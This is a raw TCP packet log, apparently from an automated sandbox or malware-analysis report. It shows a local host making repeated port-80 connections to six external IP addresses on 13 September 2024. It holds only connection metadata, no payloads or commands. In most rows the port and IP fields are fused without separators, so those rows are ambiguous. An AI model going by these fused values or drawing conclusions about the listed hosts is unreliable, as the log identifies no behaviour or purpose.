                      Sep 13, 2024 12:27:12.278346062 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.278445959 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.278461933 CEST | 50401 | 80 | 192.168.2.4 | 34.150.58.73
                      Sep 13, 2024 12:27:12.278492928 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.278523922 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.278557062 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.278641939 CEST | 50401 | 80 | 192.168.2.4 | 34.150.58.73
                      Sep 13, 2024 12:27:12.278641939 CEST | 50401 | 80 | 192.168.2.4 | 34.150.58.73
                      Sep 13, 2024 12:27:12.477855921 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.477894068 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.477910995 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.477926970 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.477943897 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.477960110 CEST | 80 | 50401 | 34.150.58.73 | 192.168.2.4
                      Sep 13, 2024 12:27:12.477977037 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.477994919 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.478040934 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.478122950 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.478431940 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.478457928 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.478457928 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.478503942 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.478534937 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.478568077 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.478785038 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.478785038 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.479612112 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.479707003 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:12.479775906 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.485502958 CEST5040180192.168.2.434.150.58.73
                      Sep 13, 2024 12:27:12.490360975 CEST805040134.150.58.73192.168.2.4
                      Sep 13, 2024 12:27:35.698365927 CEST5040280192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:35.703267097 CEST8050402195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:35.703397989 CEST5040280192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:35.725639105 CEST5040280192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:35.730505943 CEST8050402195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:36.406054020 CEST8050402195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:36.406119108 CEST8050402195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:36.406188965 CEST5040280192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:37.238989115 CEST5040280192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:38.258964062 CEST5040380192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:38.264022112 CEST8050403195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:38.264234066 CEST5040380192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:38.277626038 CEST5040380192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:38.282725096 CEST8050403195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:38.981177092 CEST8050403195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:38.981232882 CEST8050403195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:38.981288910 CEST5040380192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:39.788244009 CEST5040380192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:40.803791046 CEST5040480192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:40.809396029 CEST8050404195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:40.809580088 CEST5040480192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:40.826318979 CEST5040480192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:40.831856966 CEST8050404195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:40.831897974 CEST8050404195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:40.831924915 CEST8050404195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:40.831952095 CEST8050404195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:40.831979036 CEST8050404195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:40.832034111 CEST8050404195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:40.832062006 CEST8050404195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:40.832087994 CEST8050404195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:40.832113981 CEST8050404195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:41.509322882 CEST8050404195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:41.509366035 CEST8050404195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:41.509593010 CEST5040480192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:42.332685947 CEST5040480192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:43.355978012 CEST5040580192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:43.361247063 CEST8050405195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:43.361464977 CEST5040580192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:43.373795033 CEST5040580192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:43.378668070 CEST8050405195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:44.114605904 CEST8050405195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:44.114667892 CEST8050405195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:44.114914894 CEST5040580192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:44.118602037 CEST5040580192.168.2.4195.24.68.25
                      Sep 13, 2024 12:27:44.123457909 CEST8050405195.24.68.25192.168.2.4
                      Sep 13, 2024 12:27:49.655751944 CEST5040680192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:49.660754919 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:49.660876036 CEST5040680192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:49.681596041 CEST5040680192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:49.686494112 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.249691963 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.249742031 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.249779940 CEST5040680192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:50.249793053 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.249829054 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.249861956 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.249871969 CEST5040680192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:50.249897003 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.249941111 CEST5040680192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:50.249969959 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.250005007 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.250045061 CEST5040680192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:50.250052929 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.250144005 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.250195980 CEST5040680192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:50.255011082 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.255044937 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.255079985 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.255090952 CEST5040680192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:50.255114079 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.255151033 CEST5040680192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:50.336692095 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.336713076 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.336757898 CEST8050406162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:50.336766005 CEST5040680192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:50.336802006 CEST5040680192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:51.191987038 CEST5040680192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:52.210294962 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:52.311269045 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.311444044 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:52.324922085 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:52.330029964 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.895612955 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.895661116 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.895693064 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.895730019 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:52.895742893 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.895792961 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.895813942 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:52.895831108 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.895844936 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.895876884 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.895906925 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:52.895916939 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.895929098 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:52.895946026 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.896502018 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:52.901026964 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.901060104 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.901093960 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.901113987 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:52.901127100 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.901427984 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:52.901463985 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.941875935 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:52.982047081 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.982084990 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.982121944 CEST8050407162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:52.982151985 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:52.982186079 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:53.832672119 CEST5040780192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:54.854692936 CEST5040880192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:54.859962940 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:54.860233068 CEST5040880192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:54.873523951 CEST5040880192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:54.878592014 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:54.878623009 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:54.878674030 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:54.878701925 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:54.878729105 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:54.878854036 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:54.878896952 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:54.878928900 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:54.878956079 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.565969944 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.566030025 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.566066980 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.566101074 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.566128969 CEST5040880192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:55.566137075 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.566170931 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.566204071 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.566217899 CEST5040880192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:55.566217899 CEST5040880192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:55.566237926 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.566291094 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.566309929 CEST5040880192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:55.566329002 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.566384077 CEST5040880192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:55.572108030 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.572141886 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.572176933 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.572232008 CEST5040880192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:55.654321909 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.654367924 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.654407978 CEST8050408162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:55.654464006 CEST5040880192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:56.379465103 CEST5040880192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:57.400866032 CEST5040980192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:57.406083107 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:57.409181118 CEST5040980192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:57.415049076 CEST5040980192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:57.419930935 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.009443045 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.009497881 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.009533882 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.009566069 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.009577990 CEST5040980192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:58.009613991 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.009651899 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.009656906 CEST5040980192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:58.009691000 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.009694099 CEST5040980192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:58.009721041 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.009752035 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.009771109 CEST5040980192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:58.009804964 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.009850979 CEST5040980192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:58.014846087 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.014902115 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.014934063 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.014950037 CEST5040980192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:58.015119076 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.015165091 CEST5040980192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:58.098437071 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.098485947 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.098526001 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:27:58.098577023 CEST5040980192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:58.098624945 CEST5040980192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:58.101593018 CEST5040980192.168.2.4162.0.213.94
                      Sep 13, 2024 12:27:58.106463909 CEST8050409162.0.213.94192.168.2.4
                      Sep 13, 2024 12:28:03.548836946 CEST5041080192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:03.553792000 CEST8050410154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:03.554687977 CEST5041080192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:03.566529989 CEST5041080192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:03.571451902 CEST8050410154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:04.472018957 CEST8050410154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:04.472120047 CEST8050410154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:04.472198009 CEST5041080192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:05.066972017 CEST5041080192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:06.085963964 CEST5041180192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:06.091272116 CEST8050411154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:06.091362953 CEST5041180192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:06.104347944 CEST5041180192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:06.109385014 CEST8050411154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:07.015767097 CEST8050411154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:07.015985012 CEST8050411154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:07.016155958 CEST5041180192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:07.614531040 CEST5041180192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:08.633091927 CEST5041280192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:08.638416052 CEST8050412154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:08.638550043 CEST5041280192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:08.649504900 CEST5041280192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:08.656332970 CEST8050412154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:08.656459093 CEST8050412154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:08.656599998 CEST8050412154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:08.656626940 CEST8050412154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:08.656671047 CEST8050412154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:08.656709909 CEST8050412154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:08.656758070 CEST8050412154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:08.656785011 CEST8050412154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:08.656810999 CEST8050412154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:09.804702997 CEST8050412154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:09.804866076 CEST8050412154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:09.804943085 CEST5041280192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:10.160953045 CEST5041280192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:11.179222107 CEST5041380192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:11.185266018 CEST8050413154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:11.186613083 CEST5041380192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:11.194531918 CEST5041380192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:11.199580908 CEST8050413154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:12.118376970 CEST8050413154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:12.118525028 CEST8050413154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:12.118591070 CEST5041380192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:12.121663094 CEST5041380192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:12.126526117 CEST8050413154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:17.681004047 CEST5041480192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:17.685942888 CEST805041447.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:17.686033964 CEST5041480192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:17.698633909 CEST5041480192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:17.703483105 CEST805041447.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:18.856379986 CEST805041447.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:18.856400013 CEST805041447.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:18.860641003 CEST5041480192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:19.207669020 CEST5041480192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:20.229573965 CEST5041580192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:20.234514952 CEST805041547.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:20.234606028 CEST5041580192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:20.249839067 CEST5041580192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:20.254688978 CEST805041547.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:21.404572964 CEST805041547.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:21.404675961 CEST805041547.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:21.405375004 CEST5041580192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:21.754530907 CEST5041580192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:22.776308060 CEST5041680192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:22.781291962 CEST805041647.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:22.781495094 CEST5041680192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:22.796809912 CEST5041680192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:22.801691055 CEST805041647.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:22.801712036 CEST805041647.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:22.801719904 CEST805041647.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:22.801723003 CEST805041647.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:22.801743984 CEST805041647.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:22.801909924 CEST805041647.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:22.801925898 CEST805041647.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:22.801934004 CEST805041647.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:22.801943064 CEST805041647.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:23.960778952 CEST805041647.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:23.960800886 CEST805041647.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:23.960870981 CEST5041680192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:24.301481009 CEST5041680192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:25.319896936 CEST5041780192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:25.325309038 CEST805041747.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:25.325634956 CEST5041780192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:25.332824945 CEST5041780192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:25.337790012 CEST805041747.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:26.499989033 CEST805041747.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:26.500077009 CEST805041747.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:26.500137091 CEST5041780192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:26.503182888 CEST5041780192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:26.507980108 CEST805041747.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:39.624701023 CEST5041880192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:39.630158901 CEST80504183.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:39.630338907 CEST5041880192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:39.642297983 CEST5041880192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:39.647186041 CEST80504183.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:41.033521891 CEST80504183.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:41.038595915 CEST5041880192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:41.145184994 CEST5041880192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:41.150513887 CEST80504183.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:42.163769007 CEST5041980192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:42.169023037 CEST80504193.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:42.169116974 CEST5041980192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:42.178606987 CEST5041980192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:42.183599949 CEST80504193.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:42.647629023 CEST80504193.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:42.647720098 CEST5041980192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:43.694619894 CEST5041980192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:43.699718952 CEST80504193.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:44.710496902 CEST5042080192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:44.715486050 CEST80504203.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:44.715599060 CEST5042080192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:44.726350069 CEST5042080192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:44.731214046 CEST80504203.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:44.731312990 CEST80504203.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:44.731326103 CEST | 80 | 50420 | 3.33.130.190 | 192.168.2.4
                      Sep 13, 2024 12:28:44.731379032 CEST | 80 | 50420 | 3.33.130.190 | 192.168.2.4
                      Sep 13, 2024 12:28:44.731398106 CEST | 80 | 50420 | 3.33.130.190 | 192.168.2.4
                      Sep 13, 2024 12:28:44.731489897 CEST | 80 | 50420 | 3.33.130.190 | 192.168.2.4
                      Sep 13, 2024 12:28:44.731503010 CEST | 80 | 50420 | 3.33.130.190 | 192.168.2.4
                      Sep 13, 2024 12:28:44.731540918 CEST | 80 | 50420 | 3.33.130.190 | 192.168.2.4
                      Sep 13, 2024 12:28:44.731554031 CEST | 80 | 50420 | 3.33.130.190 | 192.168.2.4
                      Sep 13, 2024 12:28:45.242965937 CEST | 80 | 50420 | 3.33.130.190 | 192.168.2.4
                      Sep 13, 2024 12:28:45.246673107 CEST | 50420 | 80 | 192.168.2.4 | 3.33.130.190
                      Sep 13, 2024 12:28:46.238883972 CEST | 50420 | 80 | 192.168.2.4 | 3.33.130.190
                      Sep 13, 2024 12:28:46.243837118 CEST | 80 | 50420 | 3.33.130.190 | 192.168.2.4
                      Sep 13, 2024 12:28:47.261060953 CEST | 50421 | 80 | 192.168.2.4 | 3.33.130.190
                      Sep 13, 2024 12:28:47.266244888 CEST | 80 | 50421 | 3.33.130.190 | 192.168.2.4
                      Sep 13, 2024 12:28:47.266534090 CEST | 50421 | 80 | 192.168.2.4 | 3.33.130.190
                      Sep 13, 2024 12:28:47.273588896 CEST | 50421 | 80 | 192.168.2.4 | 3.33.130.190
                      Sep 13, 2024 12:28:47.278481007 CEST | 80 | 50421 | 3.33.130.190 | 192.168.2.4
